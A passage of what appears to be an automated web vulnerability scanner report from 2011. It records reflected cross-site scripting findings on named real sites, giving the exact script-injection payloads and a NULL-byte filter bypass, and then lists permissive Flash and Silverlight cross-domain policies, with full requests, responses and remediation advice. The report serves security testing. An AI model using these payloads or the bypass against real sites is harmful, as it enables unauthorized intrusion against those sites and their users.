This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:48:20 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 24711
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=fa04d"-alert(1)-"18e25f0779e"; s.pageName=""; s.prop1=""; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8=""; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=" ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f909a"-alert(1)-"0aedf1bf8a2 was submitted in the Referer HTTP header. This input was echoed as f909a"-alert(1)-"0aedf1bf8a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20379
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<!-- UI framework designed and implemented by Advertiser Portal UI Team -->
<title>SuperPages ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=%00f909a"-alert(1)-"0aedf1bf8a2"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Badly formatted flow execution key ''||(utl_inaddr ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f3def"-alert(1)-"88a42c498f7 was submitted in the Referer HTTP header. This input was echoed as f3def"-alert(1)-"88a42c498f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:07:08 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Length: 21226
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Online Advertising : Superpages Small Business Online Advertising</title>
...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=%00f3def"-alert(1)-"88a42c498f7"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="Badly formatted flow execution key ''||(utl_inaddr ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d5"><script>alert(1)</script>a3477cdc5c1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:47:15 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=70 Content-Length: 32288
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <input type="hidden" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)266d5"><script>alert(1)</script>a3477cdc5c1" id="flagUserAgent" name="flagUserAgent"/> ...[SNIP]...
3.493. http://shop.aol.ca/store/list.adp [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://shop.aol.ca
Path: /store/list.adp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edadc"><script>alert(1)</script>81318b986fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /store/list.adp?edadc"><script>alert(1)</script>81318b986fe=1 HTTP/1.1 Host: shop.aol.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: 2e76.v.fwmrm.net Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _cph="1295039779.438.1.1,"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _uid="a104_5562153497824379009"; _wr="g11951"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; _sc="sg11951.1296072535.1296076541.28800.2377.0,"
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for FreeWheel Media Servers. For support contact webmaster at ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.1 Host: adserver.adtechus.com Proxy-Connection: keep-alive Referer: http://core.videoegg.com/eap/12368/html/swf/AdManager.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=4D30B9576E651A440C6EAF39F001851E; autotrdr_exclude=autotrdr_exclude
Response
HTTP/1.0 200 OK Connection: close Cache-Control: no-cache Content-Type: text/xml Content-Length: 111
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:34 GMT Server: Apache Last-Modified: Fri, 17 Jul 2009 15:29:39 GMT ETag: "2e0ae0-117-46ee874ddbec0" Accept-Ranges: bytes Content-Length: 279 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.1 Host: audience.visiblemeasures.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:56 GMT Content-Type: application/xml Content-Length: 169 Last-Modified: Thu, 04 Nov 2010 01:46:34 GMT Server: Jetty(7.x.y-SNAPSHOT)
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.1 Host: beacon.securestudies.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Vary: Accept-Encoding Expires: Fri, 04 Feb 2011 21:07:36 GMT Date: Thu, 03 Feb 2011 21:07:36 GMT Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS Content-Length: 201
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: bp.specificclick.net
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/xml Content-Length: 193 Date: Thu, 03 Feb 2011 19:11:24 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 If-Modified-Since: Tue, 21 Dec 2010 18:59:05 UTC
Response
HTTP/1.1 200 OK X-BC-Client-IP: 173.193.214.243 X-BC-Connecting-IP: 173.193.214.243 Last-Modified: Tue, 01 Feb 2011 21:45:33 UTC Cache-Control: must-revalidate,max-age=0 Content-Type: application/xml Content-Length: 387 Date: Thu, 03 Feb 2011 19:34:37 GMT Server:
<?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo ...[SNIP]... <allow-access-from domain="*" secure="false" /> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com
Response
HTTP/1.0 200 OK Content-Length: 509 Content-Type: text/xml Last-Modified: Thu, 27 Aug 2009 08:53:58 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 x-server: web103 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" X-Powered-By: ASP.NET Cache-Control: max-age=86400 Date: Fri, 04 Feb 2011 02:02:16 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: col.stc.s-msn.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT Accept-Ranges: bytes ETag: "06e6dae977dc81:0", Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Server: co1mppstca03 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Fri, 04 Feb 2011 17:55:20 GMT Content-Length: 224 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a908de3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 01:49:40 GMT Connection: close Content-Length: 277
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: gscounters.gigya.com
Response
HTTP/1.1 200 OK Content-Length: 341 Content-Type: text/xml Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT Accept-Ranges: bytes ETag: "c717c7c65530ca1:271f" Server: Microsoft-IIS/6.0 P3P: CP="IDC COR PSA DEV ADM OUR IND ONL" x-server: web202 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 02:02:15 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: ll.static.abc.com
Response
HTTP/1.0 200 OK Cache-Control: max-age=150 Content-Type: text/xml Accept-Ranges: bytes ETag: "8067593ddb1cb1:1a129" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc02 Cache-Expires: Thu, 03 Feb 2011 16:07:43 GMT Content-Length: 224 X-UA-Compatible: IE=EmulateIE7 Date: Fri, 04 Feb 2011 01:59:12 GMT Last-Modified: Tue, 11 Jan 2011 22:19:13 GMT Expires: Fri, 04 Feb 2011 02:01:42 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: superpages.122.2o7.net
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:17:34 GMT Server: Omniture DC/2.0.0 xserver: www17 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0 Host: uat.netmng.com
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:10:56 GMT Server: Apache/2.2.9 Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT ETag: "1b6168-6a-4974ab3a2af00" Accept-Ranges: bytes Content-Length: 106 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.abc.com
Response
HTTP/1.0 200 OK Content-Length: 856 Content-Type: text/xml Last-Modified: Tue, 11 Jan 2011 22:19:00 GMT Accept-Ranges: bytes ETag: "062b58bddb1cb1:5799" Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abcmed09 X-Powered-By: ASP.NET Cache-Expires: Tue, 11 Jan 2011 22:26:38 GMT X-UA-Compatible: IE=EmulateIE7 Cache-Control: max-age=246 Date: Fri, 04 Feb 2011 02:02:28 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: adadvisor.net
Response
HTTP/1.1 200 OK Date: Fri, 04 Feb 2011 17:54:51 GMT Server: Apache Last-Modified: Fri, 21 Jan 2011 20:30:42 GMT ETag: "165-49a611fc44056" Accept-Ranges: bytes Content-Length: 357 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.1 Host: ak1.ostkcdn.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT Accept-Ranges: bytes ntCoent-Length: 230 Content-Type: text/x-cross-domain-policy X-Pad: avoid browser bug Cache-Control: private Date: Thu, 03 Feb 2011 22:00:35 GMT Connection: close Vary: Accept-Encoding Content-Length: 230
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.1 Host: ak2.ostkcdn.com Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Last-Modified: Thu, 16 Dec 2010 06:09:38 GMT Accept-Ranges: bytes ntCoent-Length: 230 Content-Type: text/x-cross-domain-policy X-Pad: avoid browser bug Cache-Control: private Date: Thu, 03 Feb 2011 22:00:42 GMT Connection: close Vary: Accept-Encoding Content-Length: 230
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Thu, 03 Feb 2011 19:10:29 GMT Expires: Fri, 04 Feb 2011 19:10:29 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 357
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apple.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT ETag: "8d-3f8918f48ef00" Server: Apache/2.2.11 (Unix) X-N: S X-Cache-TTL: 600 X-Cached-Time: Wed, 22 Dec 2010 18:51:54 GMT Content-Type: application/xml Content-Length: 141 Cache-Control: max-age=158 Expires: Thu, 03 Feb 2011 17:50:08 GMT Date: Thu, 03 Feb 2011 17:47:30 GMT Connection: close
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: dev.virtualearth.net
Response
HTTP/1.1 200 OK Cache-Control: max-age=5443200 Content-Type: text/xml Last-Modified: Mon, 13 Dec 2010 18:38:09 GMT Accept-Ranges: bytes ETag: "a92e8be3f49acb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Fri, 04 Feb 2011 01:49:40 GMT Connection: close Content-Length: 374
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: superpages.122.2o7.net
Response
